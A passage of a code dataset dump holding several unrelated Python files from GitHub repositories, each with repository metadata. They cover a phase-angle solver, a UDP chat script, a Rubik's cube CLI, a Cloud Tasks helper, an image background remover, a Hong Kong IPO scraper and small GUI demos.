solvers possible for the problem\nRunning this file will run the 'Testing Unit` to test functions\"\"\"\n\n\n# Importing modules\n\nimport numpy as np \nfrom objective_function import get_J, get_U, vector_U\nimport time\nimport tools\n\n\n\n\n# Define Functions\n\n\ndef get_X(tensor_U, k, X0):\n \"\"\" Calculate X(k-1)\n tensor_U is the tensor (N,n,3,3) we calculate from vector_U function\n X0 : intial condition\n k: index for theta \"\"\"\n\n if k !=0:\n tensor_U_X = tensor_U[:, k-1::-1, :, :] # slice tesnor U from 0 to k-1\n X = tools.np_multi_matmul(tensor_U_X, axis=1) @ X0 \n else:\n X = X0 # for theat[0]\n return X\n\n\n\n\n\ndef get_Y(tensor_U, k, Yt):\n \"\"\" Calculate Y(k+1)\n tensor_U is the tensor (N,n,3,3) we calculate from vector_U function\n Yt : Target condition\n k: index for theta \"\"\"\n\n if k+1 != tensor_U.shape[1]:\n tensor_U_Y = tensor_U[:, -1:k:-1,:,:] # slice tesnor U from n to k+1\n Y = Yt @ tools.np_multi_matmul(tensor_U_Y, axis=1) \n else:\n Y = Yt # for theta[n]\n return Y\n\n\n\n\n\n\ndef get_e_k(tensor_U, k, Yt, X0):\n \"\"\" Calculate e\n Cross product of X,Y summation over w \n tensor_U is the tensor (N,n,3,3) we calculate from vector_U function\n X0 : Intial condition\n Yt : Target condition\n k: index for theta\"\"\"\n\n X_k = get_X(tensor_U = tensor_U, k= k, X0= X0)\n Y_k = get_Y(tensor_U = tensor_U, k= k, Yt= Yt)\n e = sum(np.cross (X_k, Y_k))\n return e\n\n\n\n\ndef update_theta (tensor_U, theta, Yt, X0):\n \"\"\" update theta \n tensor_U is the tensor (N,n,3,3) we calculate from vector_U function\n X0 : Intial condition\n Yt : Target condition\n theta: Phase angles\"\"\"\n\n theta_updated = np.zeros(theta.shape) # Broadcast empty matrix\n\n for count in range(len(theta)):\n e= get_e_k(tensor_U = tensor_U, k= count, Yt= Yt, X0= X0) # Get e for every theta\n np.seterr(divide='ignore') # Ignore intial divide by zero erro\n theta_updated[count] = np.arctan (e[0,1] / e[0,0]) # calculate updated theta\n return theta_updated\n\n\n\n\n\n\ndef standard_solver(theta, w, N, dt, OMEGA_x, OMEGA_y, OMEGA_z, X0, Yt):\n \"\"\" Solving the model\n theta = list(n) of theta values\n w = random frequencies\n N = Number random frequencies wj over [B, -B]\n dt = time interval\n OMEGA_x, OMEGA_y, OMEGA_z: Intial conditions 3x3 matrices\n \"\"\"\n \n tensor_U = vector_U(theta_k =theta, wj = w, dt = dt, OMEGA_x = OMEGA_x, OMEGA_y = OMEGA_y, OMEGA_z = OMEGA_z)\n J = sum(Yt @ tools.np_multi_matmul(tensor_U, axis=1) @ X0) / N\n print('Trial #0: J=', J)\n iter_n = 0\n while (J < 0.999) or (iter_n < 1000):\n start_time = time.time()\n theta = update_theta(tensor_U, theta, Yt= Yt, X0= X0)\n tensor_U = vector_U(theta_k =theta, wj = w, dt = dt, OMEGA_x = OMEGA_x, OMEGA_y = OMEGA_y, OMEGA_z = OMEGA_z)\n J = sum(Yt @ tools.np_multi_matmul(tensor_U, axis= 1) @ X0) / N\n iter_n += 1\n print('Trial #',iter_n,': J=', J,' in ', round(time.time()-start_time, 2), 'seconds\\n')\n\n return\n\n\n\n\n\n\n\n\n\n\n\n\"\"\" Testing Unit \"\"\"\n\nif __name__ == \"__main__\":\n\n \n import tools\n\n \"\"\" Inputs \n We shall start with test case parameters\n \"\"\"\n\n\n\n B = 3\n T = 20*np.pi\n N = 300 # Number random frequencies wj over [B, -B]\n X0 = [0,0,1]\n Yt = [1,0,0]\n\n\n OMEGA_x = [\n [0, 0, 0],\n [0, 0, -1],\n [0, 1, 0]]\n\n OMEGA_y = [\n [0, 0, 1],\n [0, 0, 0],\n [-1,0, 0]]\n\n OMEGA_z = [\n [0, -1, 0],\n [1, 0, 0],\n [0, 0, 0]]\n\n OMEGA_x = tools.convert_numpy(OMEGA_x)\n OMEGA_y = tools.convert_numpy(OMEGA_y)\n OMEGA_z = tools.convert_numpy(OMEGA_z)\n\n #convert X0, Yt into numpy array (1X3 vectors)\n X0 = tools.convert_numpy(X0)\n Yt = tools.convert_numpy(Yt)\n\n\n\n\n w = tools.get_w(B, N) # Pseudorandom wj\n n = 20 # assume number of thetas\n dt= T/n \n intial_theta = np.zeros(n)\n tensor_U = vector_U(theta_k =intial_theta, wj = w, dt = dt, OMEGA_x = OMEGA_x, OMEGA_y = OMEGA_y, OMEGA_z = OMEGA_z)\n\n\n \n print('Testing Funtion : get_X, get_Y \\n\\\n test case inputs output =')\n print('for wj=', w[0])\n X = get_X(tensor_U, k=3, X0 = X0)\n print('function: get_x[3]:', X[0], 'norm(X)=', np.linalg.norm(X[0]))\n \n print()\n print()\n Y= get_Y(tensor_U, k=3, Yt = Yt)\n print('function: get_y[3]:', Y[0], 'norm(Y)=', np.linalg.norm(Y[0]))\n \n \n print('Testing Funtion : get_e_k() \\n\\\n test case inputs output =')\n print('function: get_e[3]:'\\\n ,get_e_k(tensor_U= tensor_U, k=3, Yt= Yt, X0= X0))\n \n\n \n print('Testing Funtion : update_theta() \\n\\\n test case inputs output =')\n\n print('function: update_theta(intial_theta):'\\\n , update_theta (tensor_U = tensor_U, theta= intial_theta, Yt= Yt, X0= X0))\n \n\n \n \n print('Testing Funtion : standard_solver() \\n\\\n test case inputs output =')\n print('function: update_theta(intial_theta):'\\\n , standard_solver(theta= intial_theta, w= w, N= N, dt= dt, OMEGA_x= OMEGA_x, OMEGA_y= OMEGA_y, OMEGA_z= OMEGA_z, X0= X0, Yt= Yt))\n \"\"\"\n\n \n\n\n \n print('choosing theta[10]')\n J_equ4 = 0\n for wj in w:\n X = get_X(theta = intial_theta, k = 10, wj= wj, N = N, dt = dt, OMEGA_x = OMEGA_x, OMEGA_y = OMEGA_y,OMEGA_z = OMEGA_z, X0 = X0)\n Y = get_Y(theta = intial_theta, k = 10, wj= wj, N = N, dt = dt, OMEGA_x = OMEGA_x, OMEGA_y = OMEGA_y,OMEGA_z = OMEGA_z, Yt = Yt)\n U = get_U(theta_k= intial_theta[3], wj = wj, dt = dt, OMEGA_x = OMEGA_x, OMEGA_y = OMEGA_y ,OMEGA_z = OMEGA_z)\n J_equ4 += Y @ U @ X \n J_equ4 = 1/N * J_equ4\n J = get_J(theta = intial_theta, w= w, N= N, dt= dt, OMEGA_x= OMEGA_x, OMEGA_y= OMEGA_y, OMEGA_z= OMEGA_z, X0= X0, Yt= Yt) \n print('calculating J from equ.3 = ' ,J, '\\ncalculating J from equ.4= ', J_equ4)\n \"\"\"","repo_name":"MagedMohamedTurk/Physical-Model","sub_path":"solver.py","file_name":"solver.py","file_ext":"py","file_size_in_byte":5890,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"15212260675","text":"import os\n\n\n# Environment variables for development\nSQUARE_TOKEN_DEV = \"XXXXXX\"\nSQUARE_ENV_DEV = \"sandbox\"\nSQUARE_VERSION_DEV = \"2021-05-13\"\n\n# Environment variables for testing\nSQUARE_TOKEN_TEST = os.environ['SQUARE_TOKEN_TEST']\n# location_id_TEST = os.environ['location_id_TEST'] # optional\nSQUARE_ENV_TEST = \"sandbox\"\nSQUARE_VERSION_TEST = \"2021-05-13\"\n","repo_name":"kefeimo/sam-square-github-actions","sub_path":"squareup_api/squareup_api/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":357,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37540218309","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport time\nfrom socket import *\nfrom threading import *\n\n\ndef recive(sock, bufsize):\n while True:\n msg = sock.recvfrom(bufsize)\n msg1, msg2 = msg\n print('\\r>>>{}:{}:{}'.format(\n msg2, time.ctime(), msg1.decode(encoding='utf-8')))\n\n\ndef send(sock, ip_port):\n while True:\n msg = input(\"\\r<<<\")\n sock.sendto(msg.encode(encoding='utf-8'), ip_port)\n\n\ndef main():\n ip = ''\n port = 8899\n ip_port = (ip, port)\n bufsize = 1024\n sersocket = socket(AF_INET, SOCK_DGRAM)\n sersocket.bind(ip_port)\n\n ip1 = '10.115.28.17'\n port1 = 7788\n ip_port1 = (ip1, port1)\n\n threads1 = Thread(target=recive, args=(sersocket, bufsize))\n threads2 = Thread(target=send, args=(sersocket, ip_port1))\n threads1.start()\n threads2.start()\n threads1.join()\n threads2.join()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"ningyanke/book_p3","sub_path":"socket/code/线程udp服务端.py","file_name":"线程udp服务端.py","file_ext":"py","file_size_in_byte":923,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33882813565","text":"from argparse import ArgumentParser\nfrom rubik.cube import Cube\nfrom rubik.kociembasolver import KociembaSolver\nfrom rubik.printer import print_cube\n\n\ndef main():\n \"\"\"\n The entry point for the CLI.\n \"\"\"\n parser = ArgumentParser(description=\"Solve a 3x3 Rubik's cube\")\n parser.add_argument(\"cube_str\",\n metavar=\"cube\",\n action=\"store\",\n nargs=\"?\",\n type=str,\n help=\"A 54-character string with the colors of each face of the cube\")\n\n args = parser.parse_args()\n cube_str: str = args.cube_str\n cube: Cube\n\n if cube_str is None:\n print(\"Generating a random cube string...\")\n cube = Cube()\n print(str(cube))\n print()\n elif len(cube_str) != 54:\n print(\"rubik: error: The cube string argument is not 54 characters long.\")\n return\n else:\n try:\n cube = Cube(cube_str)\n except ValueError as e:\n print(f\"rubik: error: {e}\")\n return\n\n # Before solver\n print_cube(cube)\n print()\n\n try:\n solver = KociembaSolver(cube)\n solver.solve()\n except Exception as e:\n print(f\"rubik: error: {e}\")\n return\n\n # After solver\n print()\n print_cube(cube)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Arvonit/rubik","sub_path":"backend/rubik/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":1354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13901340235","text":"import sys\nfrom PyQt6.QtWidgets import *\n\n\nclass DlgMain(QDialog):\n def __init__(self):\n super().__init__()\n self.setWindowTitle('My GUI')\n self.setGeometry(50, 50, 300, 300)\n\n # Tab Widget\n self.main = QHBoxLayout()\n self.tab = QTabWidget(self)\n self.tab.setTabPosition(QTabWidget.tabPosition(self.tab).East)\n self.tab.setMovable(True)\n self.tab.setTabsClosable(True)\n self.tab.tabCloseRequested.connect(self.empty)\n\n self.w1 = QWidget()\n self.w2 = QWidget()\n self.w3 = QWidget()\n self.w4 = QWidget()\n self.w5 = QWidget()\n self.tab.addTab(self.w1, '1')\n self.tab.addTab(self.w2, '2')\n self.tab.addTab(self.w3, '3')\n self.tab.addTab(self.w4, '4')\n self.tab.setTabText(2, 'changed')\n self.tab.insertTab(2, self.w5, '5')\n self.main.addWidget(self.tab)\n\n # QList Widgets\n\n def empty(self):\n pass\n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n main = DlgMain()\n main.show()\n sys.exit(app.exec())\n\n","repo_name":"throwmeister/gui_experiments","sub_path":"guis/syntax_advanced.py","file_name":"syntax_advanced.py","file_ext":"py","file_size_in_byte":1092,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19119542163","text":"def add_time(start, duration, setDay=None):\n\tstartHour = int(start[:start.find(\":\")])\n\taddHour = int(duration[:duration.find(\":\")])\n\thours = startHour + addHour\n\t\n\tstartMin = int(start[start.find(\":\")+1:start.find(\"M\")-1])\n\taddMin = int(duration[duration.find(\":\")+1:])\n\tminutes = startMin + addMin\n\t\n\tturn_i = start[-2:]\n\tturn_f = turn_i\n\t\n\tcountDays = hours/24\n\t\n\tweek = [\"Sunday\", \"Monday\", \"Tuesday\", \"Wednesday\", \"Thursday\", \"Friday\", \"Saturday\"]\n\t\n\tsumHour = hours\n\tif minutes >= 60:\n\t\thours += 1\n\t\tsumHour = hours\n\t\tcountDays = hours/24\n\t\twhile minutes > 59:\n\t\t\tminutes -= 60\n\t\t\tcontinue\n\tif int(hours/12) % 2 != 0:\n\t\tif turn_i == \"PM\":\n\t\t\tturn_f = \"AM\"\n\t\telse:\n\t\t\tturn_f = \"PM\"\n\twhile hours > 12:\n\t\thours -= 12\n\t\tcontinue\n\t\n\tif setDay == None:\n\t\tnew_time = '{}:{} {}'.format(str(hours), str(minutes).zfill(2), turn_f)\n\t\tif turn_i == \"AM\" and 24 <= sumHour < 48:\n\t\t\tnew_time = '{} (next day)'.format(new_time)\n\t\telif turn_i == \"PM\" and 12 <= sumHour < 36:\n\t\t\tnew_time = '{} (next day)'.format(new_time)\n\t\telif sumHour >=36:\n\t\t\tnew_time = '{} ({} days later)'.format(new_time, round(countDays))\n\telse:\n\t\tday = int(round(countDays) + week.index(setDay.capitalize()))\n\t\tif day >= 6:\n\t\t\twhile day > 6:\n\t\t\t\tday -= 7\n\t\t\t\tcontinue\n\t\t\tday = week[day]\n\t\telse:\n\t\t\tday = week[day]\n\t\t\t\n\t\tnew_time = '{}:{} {}, {}'.format(str(hours), str(minutes).zfill(2), turn_f, day)\n\t\tif turn_i == \"AM\" and 24 <= sumHour < 48:\n\t\t\tnew_time = '{} (next day)'.format(new_time)\n\t\telif turn_i == \"PM\" and 12 <= sumHour < 36:\n\t\t\tnew_time = '{} (next day)'.format(new_time)\n\t\telif sumHour >=36:\n\t\t\tnew_time = '{} ({} days later)'.format(new_time, round(countDays))\n\t\t\t\n\treturn new_time ","repo_name":"KentAugust/my-freeCodeCamp-Projects","sub_path":"Scientific Computing/time calculator/time_calculator.py","file_name":"time_calculator.py","file_ext":"py","file_size_in_byte":1664,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17771739178","text":"import datetime\nimport json\nfrom google.cloud.tasks_v2 import CloudTasksClient, HttpMethod\nfrom google.protobuf import duration_pb2, timestamp_pb2\nfrom .config import CreateTaskConfig\n\n\nclass CreateTask:\n \"\"\"The class contains a method to create a new task on GCP Cloud Tasks.\"\"\"\n\n def __init__(self, _config: CreateTaskConfig) -> None:\n self.config = _config\n\n def create_new_task(self) -> None:\n \"\"\"Creates a new task on Cloud Tasks.\n\n Constructs the task with the environment variables input and sends the\n transaction to Cloud Tasks to create a new task in the queue.\n \"\"\"\n # Create a client.\n client = CloudTasksClient()\n\n project = self.config.PROJECT\n queue = self.config.QUEUE\n location = self.config.LOCATION\n url = self.config.CLOUD_RUN_URL\n payload = None\n in_seconds = self.config.IN_SECONDS\n task_name = None\n deadline = self.config.DEADLINE\n audience = self.config.AUDIENCE\n service_account_email = self.config.SERVICE_ACCOUNT_DETAIL\n\n # Construct the fully qualified queue name.\n parent = client.queue_path(project, location, queue)\n\n # Construct the request body.\n task = {\n \"http_request\": { # Specify the type of request.\n \"http_method\": HttpMethod.POST,\n \"url\": url, # The full url path that the task will be sent to.\n \"oidc_token\": {\n \"service_account_email\": service_account_email,\n \"audience\": audience,\n },\n }\n }\n\n if payload is not None:\n if isinstance(payload, dict):\n # Convert dict to JSON string\n payload = json.dumps(payload)\n # specify http content-type to application/json\n task[\"http_request\"][\"headers\"] = {\"Content-type\": \"application/json\"}\n\n # The API expects a payload of type bytes.\n converted_payload = payload.encode()\n\n # Add the payload to the request.\n task[\"http_request\"][\"body\"] = converted_payload\n\n if in_seconds is not None:\n # Convert \"seconds from now\" into an rfc3339 datetime string.\n d = datetime.datetime.utcnow() + datetime.timedelta(seconds=in_seconds)\n\n # Create Timestamp protobuf.\n timestamp = timestamp_pb2.Timestamp()\n timestamp.FromDatetime(d)\n\n # Add the timestamp to the tasks.\n task[\"schedule_time\"] = timestamp\n\n if task_name is not None:\n # Add the name to tasks.\n task[\"name\"] = client.task_path(project, location, queue, task_name)\n\n if deadline is not None:\n # Add dispatch deadline for requests sent to the worker.\n duration = duration_pb2.Duration()\n duration.FromSeconds(deadline)\n task[\"dispatch_deadline\"] = duration\n\n # Use the client to build and send the task.\n response = client.create_task(request={\"parent\": parent, \"task\": task})\n\n print(\"Created task {}\".format(response.name))\n","repo_name":"bandprotocol/vrf-worker-v1","sub_path":"app/helpers/create_task.py","file_name":"create_task.py","file_ext":"py","file_size_in_byte":3154,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"21646277950","text":"import os\nimport sys\nimport cv2\nimport time\nimport numpy as np\n\nfrom keras.models import Model, load_model\n## 使用GPU\nfrom keras import backend as K\nK.tensorflow_backend._get_available_gpus()\n\n\n## 將原圖與預測出來的遮罩合併在一起,去掉背景\n## imgPath : 圖片路徑\n## model : 訓練完的模型\ndef removeBackground(imgPath, model):\n # imgOrg = cv2.imread(imgPath)\n imgOrg = imgPath\n width, height = imgOrg.shape[:2]\n img = cv2.resize(imgOrg, (256, 256))\n img = img.astype(np.float32) / 255.0\n img = np.expand_dims(img, axis=0)\n mask = model.predict(img)\n mask = (mask > 0.5).astype(np.uint8) ### 因為 sigmoid 結果為 0~1 之間,所以要取一半作為臨界值\n mask = np.squeeze(mask) #### 將 mask 降維 (256,256,1) -> (256,256)\n mask = cv2.resize(mask, (height, width), interpolation=cv2.INTER_CUBIC)\n b,g,r = cv2.split(imgOrg) # get b,g,r\n imgOrg = cv2.merge([r,g,b]) # switch it to rgb\n remove = cv2.bitwise_and(imgOrg, imgOrg, mask= mask)\n b,g,r = cv2.split(remove)\n remove = cv2.merge([r,g,b])\n return remove\n # cv2.imshow('Original', imgOrg)\n # cv2.imshow('Remove', remove)\n # cv2.waitKey(0)\n # plt.figure(figsize=(15,15))\n # plt.subplot(121)\n # plt.grid(False)\n # plt.imshow(imgOrg)\n # plt.subplot(122)\n # plt.grid(False)\n # plt.imshow(remove)\n\n################################ 背景與分割圖片做合成 #########################################\ndef MergeBackground(foreground, background, maskPath): \n # Read the images\n mask = maskPath\n _, alpha = cv2.threshold(mask, 0, 255, cv2.THRESH_BINARY)\n background = cv2.resize(background, (foreground.shape[1], foreground.shape[0]), \n interpolation=cv2.INTER_CUBIC)\n \n # Convert uint8 to float\n foreground = foreground.astype(float)\n background = background.astype(float)\n \n # Normalize the alpha mask to keep intensity between 0 and 1\n alpha = alpha.astype(float)/255.0\n \n # Multiply the foreground with the alpha matte\n foreground = cv2.multiply(alpha, foreground)\n \n # Multiply the background with ( 1 - alpha )\n background = cv2.multiply(1.0 - alpha, background)\n \n # Add the masked foreground and background.\n outImage = cv2.add(foreground, background)\n\n outImage = outImage/255\n saveImg = np.zeros((foreground.shape[0], foreground.shape[1], 3))\n cv2.normalize(outImage, saveImg, 0, 255, cv2.NORM_MINMAX)\n # b,g,r = cv2.split(saveImg)\n # saveImg = cv2.merge([r,g,b])\n saveImg = saveImg.astype(np.uint8)\n # cv2.imwrite('tt.png', saveImg)\n return saveImg\n # print(outImage.shape)\n\n # # Display image\n # plt.imshow(outImage)\n # cv2.imwrite('tt.png', saveImg)\n\n\n#################### 將背景為黑色變為透明 ##############################\ndef BlackBackgroundToTransparent(imgPath, savePath):\n image = cv2.imread(imgPath)\n # image = cv2.cvtColor(image, cv2.COLOR_RGB2BGR)\n image = cv2.cvtColor(image, cv2.COLOR_BGR2BGRA)\n image[np.all(image == [0, 0, 0, 255], axis=2)] = [0, 0, 0, 0]\n cv2.imwrite(savePath, image)\n\n# def imageDetection(img):\n# m = 0\n# if (img.shape[0] % 2) != 0:\n# m = np.insert(img, 0, values=0, axis=0)\n# elif (img.shape[1] % 2) != 0:\n# m = np.insert(img, 0, values=0, axis=1)\n# elif img.shape[1] % 2 == 0 and img.shape[0] % 2 == 0:\n# m = img\n# return m","repo_name":"YochLin/NTUT_HW","sub_path":"ADIP/Remove.py","file_name":"Remove.py","file_ext":"py","file_size_in_byte":3511,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30941368552","text":"# -*- coding: utf-8 -*-\n# @Time : 2021/6/28 23:15\n# @File : aastock_new_stock.py\n# @Author : Rocky C@www.30daydo.com\n\n\n'''\nhttp://www.aastocks.com/sc/stocks/market/ipo/listedipo.aspx?s=3&o=0&page=20\n'''\n\nimport time\nfrom parsel import Selector\nfrom selenium import webdriver\nimport sys\n\nsys.path.append('..')\nimport datetime\nfrom common.BaseService import BaseService\nfrom configure.settings import DBSelector\n\npath = r'C:\\OneDrive\\Python\\selenium\\chromedriver.exe'\n\n\nclass AAStockNewStock(BaseService):\n\n def __init__(self):\n super(AAStockNewStock, self).__init__('../log/aastock.log')\n self.conn = DBSelector().get_mysql_conn('db_stock')\n self.cursor = self.conn.cursor()\n\n def create_table(self):\n sql = '''CREATE TABLE IF NOT EXISTS `tb_hk_new_stock` (\n `id` int(11) NOT NULL AUTO_INCREMENT PRIMARY KEY ,\n `name` varchar(50) DEFAULT NULL,\n `code` varchar(10) NOT NULL,\n `issue_date` date DEFAULT NULL,\n `each_hand_stock` varchar(50) DEFAULT NULL,\n `share_value_Yi` varchar(50) DEFAULT NULL,\n `margin_price` varchar(50) DEFAULT NULL,\n `price` float(255,4) DEFAULT NULL,\n `over_price_part` varchar(50) DEFAULT NULL,\n `hit_least_num` int(255) DEFAULT NULL,\n `hit_ratio` float(255,4) DEFAULT NULL,\n `current_price` float(255,4) DEFAULT NULL,\n `first_day_raise` float(255,4) DEFAULT NULL,\n `accumulate_raise` float(255,4) DEFAULT NULL,\n `crawltime` DATETIME DEFAULT NULL,\n UNIQUE INDEX code_ix(`code` ASC)\n ) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4'''\n\n try:\n self.cursor.execute(sql)\n except Exception as e:\n print(e)\n self.conn.rollback()\n else:\n self.conn.commit()\n\n def fetch(self, page):\n options = webdriver.ChromeOptions()\n options.add_experimental_option('excludeSwitches', ['enable-automation'])\n prefs = {'profile.managed_default_content_settings.images': 2}\n options.add_experimental_option('prefs', prefs)\n options.add_argument(\n '--user-agent=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36')\n driver = webdriver.Chrome(executable_path=path,\n chrome_options=options)\n driver.implicitly_wait(40)\n\n url = 'http://www.aastocks.com/sc/stocks/market/ipo/listedipo.aspx?s=3&o=0&page={}'\n for p in range(1, page + 1):\n driver.get(url.format(p))\n time.sleep(5)\n yield driver.page_source\n\n def convert_float(self, data):\n if data is None:\n print('数据为空')\n return None\n data = data.strip().replace('%', '').replace(',', '')\n\n try:\n print('解析后')\n print(data)\n data = float(data)\n\n except Exception as e:\n if data != 'N/A':\n print('解析异常')\n print(data)\n data = None\n return data\n\n def convert_date(self, data_str):\n try:\n date = datetime.datetime.strptime(data_str, '%Y/%m/%d')\n except Exception as e:\n print(e)\n date = None\n\n return date\n\n def convert_hand_int(self, data):\n try:\n data = int(data.strip().replace('手', ''))\n except:\n data = None\n return data\n\n def parse(self, content):\n response = Selector(text=content)\n ipo_list = response.xpath('//div[@id=\"IPOListed\"]/table/tbody/tr')\n insert_sql = '''insert into `tb_hk_new_stock` (`name`,`code`,`issue_date`,`each_hand_stock`,`share_value_Yi`,`margin_price`,`price`,`over_price_part`,`hit_least_num`,`hit_ratio`,`current_price`,`first_day_raise`,`accumulate_raise`,`crawltime`)\n VALUES(%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s) ON DUPLICATE KEY UPDATE `crawltime`=%s'''\n\n for ipo_item in ipo_list:\n item_list = ipo_item.xpath('.//td')\n if len(item_list) < 2:\n continue\n name = item_list[1].xpath('.//a[1]/text()').extract_first()\n code = item_list[1].xpath('.//a[2]/text()').extract_first()\n issue_date = self.convert_date(item_list[2].xpath('.//text()').extract_first())\n each_hand_stock = item_list[3].xpath('.//text()').extract_first()\n share_value_Yi = item_list[4].xpath('.//text()').extract_first()\n margin_price = item_list[5].xpath('.//text()').extract_first()\n price = self.convert_float(item_list[6].xpath('.//text()').extract_first())\n over_price_part = item_list[7].xpath('.//text()').extract_first()\n hit_least_num = self.convert_hand_int(item_list[8].xpath('.//text()').extract_first())\n hit_ratio = self.convert_float(item_list[9].xpath('.//text()').extract_first())\n current_price = self.convert_float(item_list[10].xpath('.//text()').extract_first())\n first_day_raise = self.convert_float(item_list[11].xpath('.//text()').extract_first())\n accumulate_raise = self.convert_float(item_list[12].xpath('.//text()').extract_first())\n now = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n\n if margin_price == 'N/A':\n # 上市失败的\n continue\n try:\n self.cursor.execute(insert_sql, (\n name, code, issue_date, each_hand_stock, share_value_Yi, margin_price, price, over_price_part,\n hit_least_num, hit_ratio, current_price, first_day_raise, accumulate_raise, now, now))\n except Exception as e:\n print(e)\n self.conn.rollback()\n else:\n self.conn.commit()\n\n def run(self):\n total_page = 25\n self.create_table()\n gen = self.fetch(total_page)\n page = 0\n for content in gen:\n print('page ', page)\n self.parse(content)\n page += 1\n self.conn.close()\n\n def clear_data(self):\n 'select code from tb_hk_new_stock group by code having count(*) as n >1'\n pass\n\n\ndef main():\n app = AAStockNewStock()\n app.run()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Rockyzsu/stock","sub_path":"hk_stock/aastock_new_stock.py","file_name":"aastock_new_stock.py","file_ext":"py","file_size_in_byte":6427,"program_lang":"python","lang":"en","doc_type":"code","stars":4515,"dataset":"github-code","pt":"53"} +{"seq_id":"10056090193","text":"import torch\nimport numpy as np\n\n\ndef threshold(in_content: torch.Tensor or np.ndarray, thresh: float = None) -> torch.Tensor or np.ndarray:\n if thresh is None:\n thresh = compute_threshold(in_content)\n\n if isinstance(in_content, torch.Tensor):\n p = (in_content > thresh).float()\n m = (in_content < -thresh).float()\n else:\n p = (in_content > thresh).astype(np.float)\n m = (in_content < -thresh).astype(np.float)\n return in_content * (p + m)\n\n\ndef compute_threshold(in_content: torch.Tensor or np.ndarray, perc: float = 10):\n return float(in_content.max() * perc/100)\n\n\ndef pocs_fk_fn(out: torch.Tensor or np.ndarray,\n data: torch.Tensor or np.ndarray,\n mask: torch.Tensor or np.ndarray,\n th: float, alp: float = 0.2) -> torch.Tensor or np.ndarray:\n assert type(out) == type(data) == type(mask)\n \n if isinstance(out, torch.Tensor):\n dim = out.ndim - 2\n _ = torch.rfft(out, dim, onesided=False)\n _ = threshold(_, th)\n _ = torch.irfft(_, dim, onesided=False)\n else:\n _ = np.fft.rfftn(out)\n _ = threshold(_, th)\n _ = np.fft.irfftn(_)\n \n pocs = _ * (1 - alp * mask)\n res = alp * data + pocs\n \n return res\n\n\nclass POCS(torch.nn.Module):\n \"\"\"\n Base implementation of POCS method.\n Arguments:\n data: tensor of data\n mask: binary tensor of mask\n weight: weighting factor between the true data and the POCS one\n forward_fn: transform forward function (from tensor to tensor)\n adjoint_fn: transform adjoint (or inverse) function (from tensor to tensor)\n thresh_perc: percentile for computing the threshold\n \"\"\"\n \n def __init__(self, data: torch.Tensor, mask: torch.Tensor, weight: float,\n forward_fn: callable, adjoint_fn: callable, thresh_perc: float = None):\n super(POCS, self).__init__()\n self.weighted_data = weight * data\n self.weighted_mask = torch.ones_like(mask) - weight * mask\n self.weight = weight\n self.forward_fn = forward_fn\n self.adjoint_fn = adjoint_fn\n self.thresh_perc = thresh_perc\n \n def __repr__(self):\n return self.__str__()\n \n def __str__(self):\n fn = str(self.forward_fn).replace(' pour récupérer la valeur associée au bouton\r\n \r\ndef choixcourbes(): #fenêtre de choix des courbes à afficher lorsque l'on est en mode dépannage\r\n a=1\r\n b=40\r\n global wg3,disload3,proprpm3,propdc3,prspd3,maptar3,praildc3,pratar3,prail3,map3,engine3,vbatt3,tair3,th2o3,toil3,poil3,tgear3,pbaro3,tecu3,fch3,load3,alti3 #1 si case cochée, zéro sinon\r\n top = tkinter.Tk() #top est le nom de la fenêtre\r\n top.title('Choix des courbes')\r\n OK=Button(top, text='OK', command=top.destroy)\r\n OK.pack(side=BOTTOM)\r\n # l = LabelFrame(fenetre, text=\"Titre de la frame\", padx=20, pady=20)\r\n Frame5 = LabelFrame(top,text=\"Autres paramètres\",borderwidth=2,relief=GROOVE)\r\n Frame5.pack(side=BOTTOM,padx=10,pady=10)\r\n Frame3b = Frame(top,borderwidth=0)#,relief=GROOVE)\r\n Frame3b.pack(side=BOTTOM,padx=10,pady=10)\r\n Frame4 = LabelFrame(Frame3b,text=\"Pression carburant\",borderwidth=2,relief=GROOVE)\r\n Frame4.pack(side=RIGHT,padx=10,pady=10)\r\n Frame3 = LabelFrame(Frame3b,text=\"Hélice\",borderwidth=2,relief=GROOVE)\r\n Frame3.pack(side=LEFT,padx=10,pady=10)\r\n Frame2 = LabelFrame(top,text=\"Moteur\",borderwidth=2,relief=GROOVE)\r\n Frame2.pack(side=RIGHT,padx=10,pady=10)\r\n Frame1 = LabelFrame(top,text=\"Admission\",borderwidth=2,relief=GROOVE)\r\n Frame1.pack(padx=10,pady=10)\r\n CheckVar1 = IntVar()\r\n CheckVar2 = IntVar()\r\n CheckVar3 = IntVar()\r\n CheckVar4 = IntVar()\r\n CheckVar5 = IntVar()\r\n CheckVar6 = IntVar()\r\n CheckVar7 = IntVar()\r\n CheckVar8 = IntVar()\r\n CheckVar9 = IntVar()\r\n CheckVar10 = IntVar()\r\n CheckVar11 = IntVar()\r\n CheckVar12 = IntVar()\r\n CheckVar13 = IntVar()\r\n CheckVar14 = IntVar()\r\n CheckVar15 = IntVar()\r\n CheckVar16 = IntVar()\r\n CheckVar17 = IntVar()\r\n CheckVar18 = IntVar()\r\n CheckVar19 = IntVar()\r\n CheckVar20 = IntVar()\r\n CheckVar21 = IntVar()\r\n CheckVar22 = IntVar()\r\n C1 = 